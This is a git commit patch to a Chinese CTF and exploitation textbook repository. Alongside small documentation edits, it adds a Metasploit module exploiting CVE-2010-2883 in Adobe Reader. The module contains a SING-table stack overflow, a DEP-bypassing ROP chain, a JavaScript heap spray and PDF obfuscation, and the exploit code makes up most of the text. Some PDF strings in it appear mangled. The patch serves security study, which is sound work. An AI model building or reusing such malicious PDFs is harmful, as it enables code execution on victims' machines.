From 9c5d6239c39c5c35418daa1bf932345847ef884f Mon Sep 17 00:00:00 2001 From: firmianay Date: Tue, 22 May 2018 15:21:13 +0800 Subject: [PATCH] fix --- SUMMARY.md | 8 +- doc/2.3.2_ollydbg.md | 11 + doc/2.4.7_cuckoo.md | 13 + doc/2_tools.md | 1 + doc/5.8.1_z3.md | 1 - doc/5.8_sat-smt.md | 2 + ... => 6.2.3_re_codegatectf2017_angrybird.md} | 5 +- ... 6.2.6_re_secconctf2017_printf_machine.md} | 5 +- doc/6.2.7_re_codegatectf2018_redvelvet.md | 17 + doc/6.3.1_web_hctf2017_babycrack.md | 2 + doc/6_writeup.md | 5 +- doc/7.1.8_adobe_reader_2010-2883.md | 1 + doc/7.1.9_ms_word_2010-2333.md | 18 - doc/7.1.9_ms_word_2010-3333.md | 29 + doc/7_exploit.md | 2 +- .../adobe_cooltype_sing.rb | 562 ++++++++++++++++++ .../cve-2010-2883.ttf | Bin 0 -> 65932 bytes .../ms10_087_rtf_pfragments_bof.rb | 199 +++++++ .../angrybird_mod | Bin .../angrybird_org | Bin .../exp.py | 0 .../default.fs | 0 .../fsmachine | Bin .../RedVelvet | Bin 0 -> 13784 bytes 24 files changed, 852 insertions(+), 29 deletions(-) create mode 100644 doc/2.4.7_cuckoo.md rename doc/{6.2.3_re_codegate2017_angrybird.md => 6.2.3_re_codegatectf2017_angrybird.md} (99%) rename doc/{6.2.6_re_seccon2017_printf_machine.md => 6.2.6_re_secconctf2017_printf_machine.md} (76%) create mode 100644 doc/6.2.7_re_codegatectf2018_redvelvet.md delete mode 100644 doc/7.1.9_ms_word_2010-2333.md create mode 100644 doc/7.1.9_ms_word_2010-3333.md create mode 100644 src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb create mode 100755 src/exploit/7.1.8_adobe_reader_2010-2883/cve-2010-2883.ttf create mode 100644 src/exploit/7.1.9_ms_word_2010-3333/ms10_087_rtf_pfragments_bof.rb rename src/writeup/{6.2.3_re_codegate2017_angrybird => 6.2.3_re_codegatectf2017_angrybird}/angrybird_mod (100%) rename src/writeup/{6.2.3_re_codegate2017_angrybird => 6.2.3_re_codegatectf2017_angrybird}/angrybird_org (100%) rename src/writeup/{6.2.3_re_codegate2017_angrybird => 6.2.3_re_codegatectf2017_angrybird}/exp.py (100%) rename src/writeup/{6.2.6_re_seccon2017_printf_machine => 6.2.6_re_secconctf2017_printf_machine}/default.fs (100%) rename src/writeup/{6.2.6_re_seccon2017_printf_machine => 6.2.6_re_secconctf2017_printf_machine}/fsmachine (100%) create mode 100644 src/writeup/6.2.7_re_codegatectf2018_redvelvet/RedVelvet diff --git a/SUMMARY.md b/SUMMARY.md index 9ef3bdd..c5b1b2e 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -59,6 +59,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [2.4.4 binwalk](doc/2.4.4_binwalk.md) * [2.4.5 Burp Suite](doc/2.4.5_burpsuite.md) * [2.4.6 Wireshark](doc/2.4.6_wireshark.md) + * [2.4.7 Cuckoo Sandbox](doc/2.4.7_cuckoo.md) * [三、分类专题篇](doc/3_topics.md) * Pwn * [3.1.1 格式化字符串漏洞](doc/3.1.1_format_string.md) @@ -156,10 +157,11 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * Reverse * [6.2.1 re XHPCTF2017 dont_panic](doc/6.2.1_re_xhpctf2017_dont_panic.md) * [6.2.2 re ECTF2016 tayy](doc/6.2.2_re_ectf2016_tayy.md) - * [6.2.3 re Codegate2017 angrybird](doc/6.2.3_re_codegate2017_angrybird.md) + * [6.2.3 re CodegateCTF2017 angrybird](doc/6.2.3_re_codegatectf2017_angrybird.md) * [6.2.4 re CSAWCTF2015 wyvern](doc/6.2.4_re_csawctf2015_wyvern.md) * [6.2.5 re PicoCTF2014 Baleful](doc/6.2.5_re_picoctf2014_baleful.md) - * [6.2.6 re SECCON2017 printf_machine](doc/6.2.6_re_seccon2017_printf_machine.md) + * [6.2.6 re SECCONCTF2017 printf_machine](doc/6.2.6_re_secconctf2017_printf_machine.md) + * [6.2.7 re CodegateCTF2018 RedVelvet](doc/6.2.7_re_codegatectf2018_redvelvet.md) * Web * [6.3.1 web HCTF2017 babycrack](doc/6.3.1_web_hctf2017_babycrack.md) * Crypto @@ -175,7 +177,7 @@ GitHub 地址:https://github.com/firmianay/CTF-All-In-One * [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](doc/7.1.6_dnstracer_2017-9430.md) * [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](doc/7.1.7_binutils_2018-6323.md) * [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](doc/7.1.8_adobe_reader_2010-2883.md) - * [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-2333.md) + * [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](doc/7.1.9_ms_word_2010-3333.md) * Malware * [八、学术篇](doc/8_academic.md) * [8.1 The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86)](doc/8.1_ret2libc_without_func_calls.md) diff --git a/doc/2.3.2_ollydbg.md b/doc/2.3.2_ollydbg.md index f77eec8..75ea1fa 100644 --- a/doc/2.3.2_ollydbg.md +++ b/doc/2.3.2_ollydbg.md @@ -1,10 +1,21 @@ # 2.3.2 OllyDbg 调试器 - [快捷键](#快捷键) +- [命令行插件](#命令行插件) - [参考资料](#参考资料) ## 快捷键 +- F2:在光标选定位置按 F2 键设置或取消断点。 +- F4:运行到光标选定位置处暂停。 +- F7:单步步入:每次执行一条指令,遇到 call 等子程序时进入其中。 +- F8:单步步过,每次执行一条指令,遇到 call 等子程序时不进入其中。 +- F9:运行,被调试软件继续运行,直到遇到下一个断点。 +- Ctrl+F9:执行到返回,在执行到一个 ret 指令时暂停,常用于从当前函数快速返回到上一个函数。 +- Alt+F9:执行到用户代码,可用于从系统部分快速返回到被调试程序部分。 + + +## 命令行插件 ## 参考资料 - http://www.ollydbg.de/ diff --git a/doc/2.4.7_cuckoo.md b/doc/2.4.7_cuckoo.md new file mode 100644 index 0000000..c663bc6 --- /dev/null +++ b/doc/2.4.7_cuckoo.md @@ -0,0 +1,13 @@ +# 2.4.7 Cuckoo Sandbox + +- [简介](#简介) +- [安装](#安装) +- [参考资料](#参考资料) + + +## 简介 + +## 安装 + +## 参考资料 +- https://cuckoosandbox.org/ diff --git a/doc/2_tools.md b/doc/2_tools.md index 968a039..490269d 100644 --- a/doc/2_tools.md +++ b/doc/2_tools.md @@ -24,3 +24,4 @@ * [2.4.4 binwalk](2.4.4_binwalk.md) * [2.4.5 Burp Suite](2.4.5_burpsuite.md) * [2.4.6 Wireshark](2.4.6_wireshark.md) + * [2.4.7 Cuckoo Sandbox](2.4.7_cuckoo.md) diff --git a/doc/5.8.1_z3.md b/doc/5.8.1_z3.md index 14f8dd3..cb88fbe 100644 --- a/doc/5.8.1_z3.md +++ b/doc/5.8.1_z3.md @@ -23,7 +23,6 @@ ``` $ git clone https://github.com/Z3Prover/z3.git $ cd z3 - $ python scripts/mk_make.py --python $ cd build $ make diff --git a/doc/5.8_sat-smt.md b/doc/5.8_sat-smt.md index d3177f4..99da957 100644 --- a/doc/5.8_sat-smt.md +++ b/doc/5.8_sat-smt.md @@ -2,5 +2,7 @@ - [参考资料](#参考资料) + ## 参考资料 - [Quick introduction into SAT/SMT solvers and symbolic execution](https://yurichev.com/writings/SAT_SMT_draft-EN.pdf) +- [Practical Symbolic Execution and SATisfiability Module Theories (SMT) 101](http://deniable.org/reversing/symbolic-execution) diff --git a/doc/6.2.3_re_codegate2017_angrybird.md b/doc/6.2.3_re_codegatectf2017_angrybird.md similarity index 99% rename from doc/6.2.3_re_codegate2017_angrybird.md rename to doc/6.2.3_re_codegatectf2017_angrybird.md index 2fd291e..746f47d 100644 --- a/doc/6.2.3_re_codegate2017_angrybird.md +++ b/doc/6.2.3_re_codegatectf2017_angrybird.md @@ -1,10 +1,10 @@ -# 6.2.3 re Codegate2017 angrybird +# 6.2.3 re CodegateCTF2017 angrybird - [题目解析](#题目解析) - [参考资料](#参考资料) -[下载文件](../src/writeup/6.2.3_re_codegate2017_angrybird) +[下载文件](../src/writeup/6.2.3_re_codegatectf2017_angrybird) ## 题目解析 看题目就知道,这是一个会让我们抓狂的程序,事实也确实如此。 @@ -266,3 +266,4 @@ you typed : Im_so_cute&pretty_:) ## 参考资料 +- https://ctftime.org/task/3375 diff --git a/doc/6.2.6_re_seccon2017_printf_machine.md b/doc/6.2.6_re_secconctf2017_printf_machine.md similarity index 76% rename from doc/6.2.6_re_seccon2017_printf_machine.md rename to doc/6.2.6_re_secconctf2017_printf_machine.md index 2a9c2b2..2d159bd 100644 --- a/doc/6.2.6_re_seccon2017_printf_machine.md +++ b/doc/6.2.6_re_secconctf2017_printf_machine.md @@ -1,10 +1,10 @@ -# 6.2.6 re SECCON2017 printf_machine +# 6.2.6 re SECCONCTF2017 printf_machine - [题目解析](#题目解析) - [参考资料](#参考资料) -[下载文件](../src/writeup/6.2.6_re_seccon2017_printf_machine) +[下载文件](../src/writeup/6.2.6_re_secconctf2017_printf_machine) ## 题目解析 ``` @@ -14,4 +14,5 @@ fsmachine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically l ## 参考资料 +- https://ctftime.org/task/5042 - [400_printf_machine](https://github.com/SECCON/SECCON2017_online_CTF/tree/master/binary/400_printf_machine) diff --git a/doc/6.2.7_re_codegatectf2018_redvelvet.md b/doc/6.2.7_re_codegatectf2018_redvelvet.md new file mode 100644 index 0000000..0857a0e --- /dev/null +++ b/doc/6.2.7_re_codegatectf2018_redvelvet.md @@ -0,0 +1,17 @@ +# 6.2.7 re CodegateCTF2018 RedVelvet + +- [题目解析](#题目解析) +- [参考资料](#参考资料) + + +[下载文件](../src/writeup/6.2.7_re_codegatectf2018_redvelvet) + +## 题目解析 +``` +$ file RedVelvet +RedVelvet: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=84e7ef91c33878cf9eefc00a7a450895aa573494, not stripped +``` + + +## 参考资料 +- https://ctftime.org/task/5231 diff --git a/doc/6.3.1_web_hctf2017_babycrack.md b/doc/6.3.1_web_hctf2017_babycrack.md index 42fe31b..ae8a1ff 100644 --- a/doc/6.3.1_web_hctf2017_babycrack.md +++ b/doc/6.3.1_web_hctf2017_babycrack.md @@ -4,6 +4,8 @@ - [解题流程](#解题流程) +[下载文件](../src/writeup/6.3.1_web_hctf2017_babycrack) + ## 题目解析 题目就不用多说了,很容易发现是 JavaScript 代码审计。 diff --git a/doc/6_writeup.md b/doc/6_writeup.md index 292708c..6a5e5df 100644 --- a/doc/6_writeup.md +++ b/doc/6_writeup.md @@ -32,10 +32,11 @@ * Reverse * [6.2.1 re XHPCTF2017 dont_panic](6.2.1_re_xhpctf2017_dont_panic.md) * [6.2.2 re ECTF2016 tayy](6.2.2_re_ectf2016_tayy.md) - * [6.2.3 re Codegate2017 angrybird](6.2.3_re_codegate2017_angrybird.md) + * [6.2.3 re CodegateCTF2017 angrybird](6.2.3_re_codegatectf2017_angrybird.md) * [6.2.4 re CSAWCTF2015 wyvern](6.2.4_re_csawctf2015_wyvern.md) * [6.2.5 re PicoCTF2014 Baleful](6.2.5_re_picoctf2014_baleful.md) - * [6.2.6 re SECCON2017 printf_machine](6.2.6_re_seccon2017_printf_machine.md) + * [6.2.6 re SECCONCTF2017 printf_machine](6.2.6_re_secconctf2017_printf_machine.md) + * [6.2.7 re CodegateCTF2018 RedVelvet](6.2.7_re_codegatectf2018_redvelvet.md) * Web * [6.3.1 web HCTF2017 babycrack](6.3.1_web_hctf2017_babycrack.md) * Crypto diff --git a/doc/7.1.8_adobe_reader_2010-2883.md b/doc/7.1.8_adobe_reader_2010-2883.md index 8ba5186..1684422 100644 --- a/doc/7.1.8_adobe_reader_2010-2883.md +++ b/doc/7.1.8_adobe_reader_2010-2883.md @@ -17,6 +17,7 @@ Adobe Reader 和 Acrobat 9.4 之前版本的 CoolType.dll 中存在基于栈的 | --- | --- | --- | | 操作系统 | Windows XP SP3 | 体系结构:32 位 | | 调试器 | OllyDbg | 版本号:吾爱专版 | +| 反汇编器 | IDA Pro | 版本号:6.8 | | 漏洞软件 | Adobe Reader | 版本号:9.3.4 | 我们利用 Metasploit 来生成攻击样本: diff --git a/doc/7.1.9_ms_word_2010-2333.md b/doc/7.1.9_ms_word_2010-2333.md deleted file mode 100644 index 36df6c8..0000000 --- a/doc/7.1.9_ms_word_2010-2333.md +++ /dev/null @@ -1,18 +0,0 @@ -# 7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞 - -- [漏洞描述](#漏洞描述) -- [漏洞复现](#漏洞复现) -- [漏洞分析](#漏洞分析) -- [参考资料](#参考资料) - - -[下载文件](../src/exploit/7.1.9_ms_word_2010-2333) - -## 漏洞描述 - -## 漏洞复现 - -## 漏洞分析 - -## 参考资料 -- https://www.cvedetails.com/cve/CVE-2010-2333 diff --git a/doc/7.1.9_ms_word_2010-3333.md b/doc/7.1.9_ms_word_2010-3333.md new file mode 100644 index 0000000..f1a3956 --- /dev/null +++ b/doc/7.1.9_ms_word_2010-3333.md @@ -0,0 +1,29 @@ +# 7.1.9 cve-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞 + +- [漏洞描述](#漏洞描述) +- [漏洞复现](#漏洞复现) +- [漏洞分析](#漏洞分析) +- [参考资料](#参考资料) + + +[下载文件](../src/exploit/7.1.9_ms_word_2010-3333) + +## 漏洞描述 +cve-2010-3333 漏洞是一个栈溢出漏洞,该漏洞是由于 Microsoft Office 软件中的 Open XML 文件格式转换器在处理 RTF 中的 "pFragments" 属性时存在栈溢出,可能导致任意代码执行。受影响的版本有:MS Office 2003 SP3、Office 2007 SP0、Office 2010 等。 + + +## 漏洞复现 +| |推荐使用的环境 | 备注 | +| --- | --- | --- | +| 操作系统 | Windows XP SP3 | 体系结构:32 位 | +| 调试器 | OllyDbg | 版本号:吾爱专版 | +| 反汇编器 | IDA Pro | 版本号:7.0 | +| 漏洞软件 | MS Office | 版本号:2003 SP3 | + +我们利用 Metasploit 来生成攻击样本 + + +## 漏洞分析 + +## 参考资料 +- https://www.cvedetails.com/cve/CVE-2010-2333 diff --git a/doc/7_exploit.md b/doc/7_exploit.md index 1bc60cf..51133af 100644 --- a/doc/7_exploit.md +++ b/doc/7_exploit.md @@ -9,5 +9,5 @@ * [7.1.6 CVE-2017-9430 DNSTracer 栈溢出漏洞](7.1.6_dnstracer_2017-9430.md) * [7.1.7 CVE-2018-6323 GNU binutils elf_object_p 整型溢出漏洞](7.1.7_binutils_2018-6323.md) * [7.1.8 CVE-2010-2883 Adobe CoolType SING 表栈溢出漏洞](7.1.8_adobe_reader_2010-2883.md) - * [7.1.9 CVE-2010-2333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-2333.md) + * [7.1.9 CVE-2010-3333 Microsoft Word RTF pFragments 栈溢出漏洞](7.1.9_ms_word_2010-3333.md) * Malware diff --git a/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb b/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb new file mode 100644 index 0000000..422e35c --- /dev/null +++ b/src/exploit/7.1.8_adobe_reader_2010-2883/adobe_cooltype_sing.rb @@ -0,0 +1,562 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'zlib' + +class MetasploitModule < Msf::Exploit::Remote + Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow', + 'Description' => %q{ + This module exploits a vulnerability in the Smart INdependent Glyplets (SING) table + handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are + assumed to be vulnerable as well. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Unknown', # 0day found in the wild + 'sn0wfl0w', # initial analysis, also @vicheck on twitter + 'jduck' # Metasploit module + ], + 'References' => + [ + [ 'CVE', '2010-2883' ], + [ 'OSVDB', '67849'], + [ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ], + [ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate', + 'DisablePayloadHandler' => 'true', + }, + 'Payload' => + { + 'Space' => 1000, + 'BadChars' => "\x00", + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Targets' => + [ + # Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd + # Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd + # Tested OK via Adobe Reader 9.3 on XP and 7 -todb + [ 'Automatic', { }], + ], + 'DisclosureDate' => 'Sep 07 2010', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']), + ]) + end + + def exploit + ttf_data = make_ttf() + + js_data = make_js(payload.encoded) + + # Create the pdf + pdf = make_pdf(ttf_data, js_data) + + print_status("Creating '#{datastore['FILENAME']}' file...") + + file_create(pdf) + end + + def make_ttf + ttf_data = "" + + # load the static ttf file + + # NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20) + path = File.join( Msf::Config.data_directory, "exploits", "cve-2010-2883.ttf" ) + fd = File.open( path, "rb" ) + ttf_data = fd.read(fd.stat.size) + fd.close + + # Build the SING table + sing = '' + sing << [ + 0, 1, # tableVersionMajor, tableVersionMinor (0.1) + 0xe01, # glyphletVersion + 0x100, # embeddingInfo + 0, # mainGID + 0, # unitsPerEm + 0, # vertAdvance + 0x3a00 # vertOrigin + ].pack('vvvvvvvv') + # uniqueName + # "The uniqueName string must be a string of at most 27 7-bit ASCII characters" + #sing << "A" * (0x254 - sing.length) + sing << rand_text(0x254 - sing.length) + + # 0xffffffff gets written here @ 0x7001400 (in BIB.dll) + sing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V') + + # This becomes our new EIP (puts esp to stack buffer) + ret = 0x4a80cb38 # add ebp, 0x794 / leave / ret + sing[0x208, 4] = [ret].pack('V') + + # This becomes the new eip after the first return + ret = 0x4a82a714 + sing[0x18, 4] = [ret].pack('V') + + # This becomes the new esp after the first return + esp = 0x0c0c0c0c + sing[0x1c, 4] = [esp].pack('V') + + # Without the following, sub_801ba57 returns 0. + sing[0x24c, 4] = [0x6c].pack('V') + + ttf_data[0xec, 4] = "SING" + ttf_data[0x11c, sing.length] = sing + + ttf_data + end + + def make_js(encoded_payload) + + # The following executes a ret2lib using icucnv36.dll + # The effect is to bypass DEP and execute the shellcode in an indirect way + stack_data = [ + 0x41414141, # unused + 0x4a8063a5, # pop ecx / ret + 0x4a8a0000, # becomes ecx + + 0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as + + 0x4a801f90, # pop eax / ret + 0x4a84903c, # becomes eax (import for CreateFileA) + + # -- call CreateFileA + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to "iso88591") + 0x10000000, # second arg - dwDesiredAccess + 0x00000000, # third arg - dwShareMode + 0x00000000, # fourth arg - lpSecurityAttributes + 0x00000002, # fifth arg - dwCreationDisposition + 0x00000102, # sixth arg - dwFlagsAndAttributes + 0x00000000, # seventh arg - hTemplateFile + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000008, # becomes ebx - offset to modify + + # + # This points at a neat-o block of code that ... TBD + # + # and [esp+ebx*2],edi + # jne check_slash + # ret_one: + # mov al,1 + # ret + # check_slash: + # cmp al,0x2f + # je ret_one + # cmp al,0x41 + # jl check_lower + # cmp al,0x5a + # jle check_ptr + # check_lower: + # cmp al,0x61 + # jl ret_zero + # cmp al,0x7a + # jg ret_zero + # cmp [ecx+1],0x3a + # je ret_one + # ret_zero: + # xor al,al + # ret + # + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849038, # becomes eax (import for CreateFileMappingA) + + # -- call CreateFileMappingA + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0xffffffff, # arguments to CreateFileMappingA, hFile + 0x00000000, # lpAttributes + 0x00000040, # flProtect + 0x00000000, # dwMaximumSizeHigh + 0x00010000, # dwMaximumSizeLow + 0x00000000, # lpName + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000008, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849030, # becomes eax (import for MapViewOfFile + + # -- call MapViewOfFile + 0x4a80b692, # jmp [eax] + + 0x4a801064, # ret + + 0xffffffff, # args to MapViewOfFile - hFileMappingObject + 0x00000022, # dwDesiredAccess + 0x00000000, # dwFileOffsetHigh + 0x00000000, # dwFileOffsetLow + 0x00010000, # dwNumberOfBytesToMap + + 0x4a8063a5, # pop ecx / ret + 0x4a8a0004, # becomes ecx - writable pointer + + 0x4a802196, # mov [ecx],eax / ret - save map base addr + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000030, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a8a0004, # becomes eax - saved file mapping ptr + + 0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x00000020, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret + + 0x4a801f90, # pop eax / ret + 0x00000034, # becomes eax + + 0x4a80d585, # add eax,edx / ret + + 0x4a8063a5, # pop ecx / ret + 0x4a801064, # becomes ecx - ptr to ret + + 0x4a842db2, # xchg eax,edi / ret + + 0x4a802ab1, # pop ebx / ret + 0x0000000a, # becomes ebx - offset to modify + + 0x4a80a8a6, # execute fun block + + 0x4a801f90, # pop eax / ret + 0x4a849170, # becomes eax (import for memcpy) + + # -- call memcpy + 0x4a80b692, # jmp [eax] + + 0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy + 0xffffffff, # becomes first arg to memcpy (dst) + 0xffffffff, # becomes second arg to memcpy (src) + 0x00001000, # becomes third arg to memcpy (length) + #0x0000258b, # ?? + #0x4d4d4a8a, # ?? + ].pack('V*') + + var_unescape = rand_text_alpha(rand(100) + 1) + var_shellcode = rand_text_alpha(rand(100) + 1) + + var_start = rand_text_alpha(rand(100) + 1) + + var_s = 0x10000 + var_c = rand_text_alpha(rand(100) + 1) + var_b = rand_text_alpha(rand(100) + 1) + var_d = rand_text_alpha(rand(100) + 1) + var_3 = rand_text_alpha(rand(100) + 1) + var_i = rand_text_alpha(rand(100) + 1) + var_4 = rand_text_alpha(rand(100) + 1) + + payload_buf = '' + payload_buf << stack_data + payload_buf << encoded_payload + + escaped_payload = Rex::Text.to_unescape(payload_buf) + + js = %Q| +var #{var_unescape} = unescape; +var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' ); +var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" ); +while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c}; +#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2); +#{var_b} += #{var_shellcode}; +#{var_b} += #{var_c}; +#{var_d} = #{var_b}.substring(0, #{var_s}/2); +while(#{var_d}.length < 0x80000) #{var_d} += #{var_d}; +#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2); +var #{var_4} = new Array(); +for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s"; +| + + js + end + + def random_non_ascii_string(count) + result = "" + count.times do + result << (rand(128) + 128).chr + end + result + end + + def io_def(id) + "%d 0 obj \n" % id + end + + def io_ref(id) + "%d 0 R" % id + end + + + #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ + def n_obfu(str) + #return str + result = "" + str.scan(/./u) do |c| + if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' + result << "#%x" % c.unpack("C*")[0] + else + result << c + end + end + result + end + + + def ascii_hex_whitespace_encode(str) + result = "" + whitespace = "" + str.each_byte do |b| + result << whitespace << "%02x" % b + whitespace = " " * (rand(3) + 1) + end + result << ">" + end + + + def make_pdf(ttf, js) + + #swf_name = rand_text_alpha(8 + rand(8)) + ".swf" + + xref = [] + eol = "\n" + endobj = "endobj" << eol + + # Randomize PDF version? + pdf = "%PDF-1.5" << eol + pdf << "%" << random_non_ascii_string(4) << eol + + # catalog + xref << pdf.length + pdf << io_def(1) << n_obfu("<<") << eol + pdf << n_obfu("/Pages ") << io_ref(2) << eol + pdf << n_obfu("/Type /Catalog") << eol + pdf << n_obfu("/OpenAction ") << io_ref(11) << eol + # The AcroForm is required to get icucnv36.dll to load + pdf << n_obfu("/AcroForm ") << io_ref(13) << eol + pdf << n_obfu(">>") << eol + pdf << endobj + + # pages array + xref << pdf.length + pdf << io_def(2) << n_obfu("<<") << eol + pdf << n_obfu("/MediaBox ") << io_ref(3) << eol + pdf << n_obfu("/Resources ") << io_ref(4) << eol + pdf << n_obfu("/Kids [") << io_ref(5) << "]" << eol + pdf << n_obfu("/Count 1") << eol + pdf << n_obfu("/Type /Pages") << eol + pdf << n_obfu(">>") << eol + pdf << endobj + + # media box + xref << pdf.length + pdf << io_def(3) + pdf << "[0 0 595 842]" << eol + pdf << endobj + + # resources + xref << pdf.length + pdf << io_def(4) + pdf << n_obfu("<<") << eol + pdf << n_obfu("/Font ") << io_ref(6) << eol + pdf << ">>" << eol + pdf << endobj + + # page 1 + xref << pdf.length + pdf << io_def(5) << n_obfu("<<") << eol + pdf << n_obfu("/Parent ") << io_ref(2) << eol + pdf << n_obfu("/MediaBox ") << io_ref(3) << eol + pdf << n_obfu("/Resources ") << io_ref(4) << eol + pdf << n_obfu("/Contents [") << io_ref(8) << n_obfu("]") << eol + pdf << n_obfu("/Type /Page") << eol + pdf << n_obfu(">>") << eol # end obj dict + pdf << endobj + + # font + xref << pdf.length + pdf << io_def(6) << n_obfu("<<") << eol + pdf << n_obfu("/F1 ") << io_ref(7) << eol + pdf << ">>" << eol + pdf << endobj + + # ttf object + xref << pdf.length + pdf << io_def(7) << n_obfu("<<") << eol + pdf << n_obfu("/Type /Font") << eol + pdf << n_obfu("/Subtype /TrueType") << eol + pdf << n_obfu("/Name /F1") << eol + pdf << n_obfu("/BaseFont /Cinema") << eol + pdf << n_obfu("/Widths []") << eol + pdf << n_obfu("/FontDescriptor ") << io_ref(9) + pdf << n_obfu("/Encoding /MacRomanEncoding") + pdf << n_obfu(">>") << eol + pdf << endobj + + # page content + content = "Hello World!" + content = "" + + "0 g" + eol + + "BT" + eol + + "/F1 32 Tf" + eol + + "32 Tc" + eol + + "1 0 0 1 32 773.872 Tm" + eol + + "(" + content + ") Tj" + eol + + "ET" + + xref << pdf.length + pdf << io_def(8) << "<<" << eol + pdf << n_obfu("/Length %s" % content.length) << eol + pdf << ">>" << eol + pdf << "stream" << eol + pdf << content << eol + pdf << "endstream" << eol + pdf << endobj + + # font descriptor + xref << pdf.length + pdf << io_def(9) << n_obfu("<<") + pdf << n_obfu("/Type/FontDescriptor/FontName/Cinema") + pdf << n_obfu("/Flags %d" % (2**2 + 2**6 + 2**17)) + pdf << n_obfu("/FontBBox [-177 -269 1123 866]") + pdf << n_obfu("/FontFile2 ") << io_ref(10) + pdf << n_obfu(">>") << eol + pdf << endobj + + # ttf stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ttf) + pdf << io_def(10) << n_obfu("<>" % [compressed.length, ttf.length]) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + # js action + xref << pdf.length + pdf << io_def(11) << n_obfu("<<") + pdf << n_obfu("/Type/Action/S/JavaScript/JS ") + io_ref(12) + pdf << n_obfu(">>") << eol + pdf << endobj + + # js stream + xref << pdf.length + compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js)) + pdf << io_def(12) << n_obfu("<>" % compressed.length) << eol + pdf << "stream" << eol + pdf << compressed << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # The following form related data is required to get icucnv36.dll to load + ### + + # form object + xref << pdf.length + pdf << io_def(13) + pdf << n_obfu("<>") << eol + pdf << endobj + + # form stream + xfa = <<-EOF + + + +1 + + +EOF + + xref << pdf.length + pdf << io_def(14) << n_obfu("<>" % xfa.length) << eol + pdf << "stream" << eol + pdf << xfa << eol + pdf << "endstream" << eol + pdf << endobj + + ### + # end form stuff for icucnv36.dll + ### + + + 